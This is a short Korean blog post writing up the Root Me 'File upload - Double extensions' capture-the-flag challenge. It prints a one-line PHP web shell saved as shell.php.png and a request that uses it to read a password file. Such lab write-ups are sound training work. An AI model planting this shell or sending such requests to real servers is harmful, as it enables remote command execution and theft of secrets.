TigerDemon
[3주차] Root Me File upload - Double extensions 본문
https://www.root-me.org/en/Challenges/Web-Server/File-upload-Double-extensions
Challenges/Web - Server : File upload - Double extensions [Root Me : Hacking and Information Security learning platform]
hello, i cannot access to the lab??
www.root-me.org

위 링크에 들어가서 챌린지를 시작하면 이렇게 뜬다. 다 눌러보니까 다 다른 이모지들이 있다.

검색을 통해 메모장에 이 코드를 적고 shell.php.png로 저장을 하고 업로드를 해보았다.
<?php
system($_GET[cmd]);
?>


업로드를 하니 저렇게 링크가 떠서 눌러보았다.

뭘해야하는 건지 모르겠어서 검색을 통해 조언을 얻고 계속해서 풀어보았다.
?cmd=cat%20../../../.passwd0
위 내용을 링크 뒤에 넣으면 바로 답이 나온다(조언을 통해 알게되었다. 감사합니다.)

위 사진에 마지막에 있는 문구를 넣어서 문제를 풀었다.

'2023-SWLUG > CTF 문제 풀이' 카테고리의 다른 글
| [3주차] Dreamhack image-storage (0) | 2023.10.04 |
|---|---|
| [3주차] Root Me Install files (0) | 2023.10.04 |
| [2주차] WEBHACKING.KR 12 (0) | 2023.09.26 |
| [2주차] Root Me Javascript - Webpack (0) | 2023.09.26 |
| [2주차] Root Me Javascript - Authentication 2 (0) | 2023.09.26 |